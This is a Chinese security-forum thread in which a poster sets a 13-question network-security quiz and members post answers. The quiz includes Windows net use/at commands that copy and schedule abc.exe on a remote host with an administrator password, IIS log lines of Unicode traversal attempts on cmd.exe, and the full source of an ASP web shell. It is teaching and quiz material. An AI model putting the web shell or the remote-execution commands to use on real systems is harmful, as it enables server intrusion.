|
![]() | 作者: aney [aney]
![]() |
登录 |
http://192.168.0.1
http://xyz.3322.org
http://3232235521 三个连接指向同一目标网站,那么它们分别是什么意义? 二、 常用端口识别 20 21 23 25 80 110 139 443 445 三、 试述下列命令作用 c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” c:\>net use z: \\211.87.194.121\c$ c:\>net time \\211.87.194.121 c:\>copy abc.exe \\211.87.194.121\admin$\system32 四、 试述下列命令的区别,如何防止该命令在本地或远程运行 c:\>at \\211.87.194.121 21:05 abc.exe c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 五、 W3SVC日志是什么?分析下面这段日志。 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 分析我酌情给分。 六、 netstat命令有何作用,举出两个参数进行说明。 七、 试述木马的一些基本特征。 八、 如何利用脚本实现对ftp的自动操作? 九、 下面是一个ASP木马,请找出支持这一程序的关键点。 <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=".CMD" size=45 value="<%= szCMD %>"> <input type=submit value="Run"> </FORM> <PRE> <% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> </BODY> </HTML> 十、 存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件, 其他思路会酌情给分) 那么,如何在不打补丁的情况下避免这种攻击的发生? 十一、OSI模型中哪一层上有协议?分别是什么? 十二、观察ping命令的返回包的TTL值,可以了解到什么? 十三、从网关得到采样 目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646 目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647 目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69 请问 这可能是什么样的会话,采用什么协议,进行什么样的作业? |
地主 发表时间: 07/14 22:28 |
![]() | 回复: cuihua [cuihua] ![]() |
登录 |
一:第一个是服务器的IP地址,第二个是服务器的域名地址,第三个是将32位的IP地址转换为十进制 二:这些端口可以自己去查 三:c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” 意思是和这台机子建一个ipc连接,用户名是administrator密码是123456 c:\>net use z: \\211.87.194.121\c$ 将对方的c盘映射为自己的z盘 c:\>net time \\211.87.194.121 看对方机子上的时间 c:\>copy abc.exe \\211.87.194.121\admin$\system32 拷贝abc.exe这个文件到这个机子上的winnt\system32这个目录下 我只知道这些 |
B1层 发表时间: 07/14 22:50 |
![]() | 回复: BearKing [bking] ![]() |
登录 |
呵呵,做题呀!有趣~~ [此贴被 BearKing(bking) 在 07月15日04时15分 编辑过] |
B2层 发表时间: 07/15 04:41 |
![]() | 回复: all528 [all528] ![]() |
登录 |
更正一下第1题的3是主机名称只可以在本机或局域网内才可以使用 |
B3层 发表时间: 07/15 08:55 |
![]() | 回复: nightcolor [nightcolor] ![]() |
登录 |
郁闷 这些题目我都做不起 救命啊 |
B4层 发表时间: 07/15 10:45 |
![]() | 回复: keke [keke1] ![]() |
登录 |
我菜菜才!!!!! |
B5层 发表时间: 07/15 11:19 |
![]() | 回复: laievf [laievf] ![]() |
登录 |
四楼的:!!! 并不是局域网的才可以,比如http://1034745675/index/index.htm同样可一访问破碎银河系的主页,他只不过把IP转换了而已 |
B6层 发表时间: 07/15 15:39 |
![]() | 回复: 286 [unique] ![]() |
登录 |
一:第一个是IP,第二个是域名,第三个是十进制 二:20,21 ftp ip 23 telnet ip 25 telnet ip 25 80,443 ie 139,445 \\ip\ipc$ 三:略 四:1 远程运行本地程序,2 本地运行远程程序. 五: 有人对该机进行unicode扫描. 六: 当前连接 七:平时隐蔽,条件激活. 八:以参数形式传命令 九:Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 十:利用缓冲区溢出. 十一:每一层都有.但都没有得到实现应用. 十二:可了解经过路由器的个数. 十三:访问WEB.并下载. |
B7层 发表时间: 07/15 16:59 |
![]() | 回复: tianyecool [tianyecool] ![]() |
登录 |
恩差不多就是那个样字,楼上的 |
B8层 发表时间: 07/15 17:25 |
![]() | 回复: rabbit305 [rabbit305] ![]() |
登录 |
哇哇。。286。服死你了。。 |
B9层 发表时间: 07/15 22:44 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号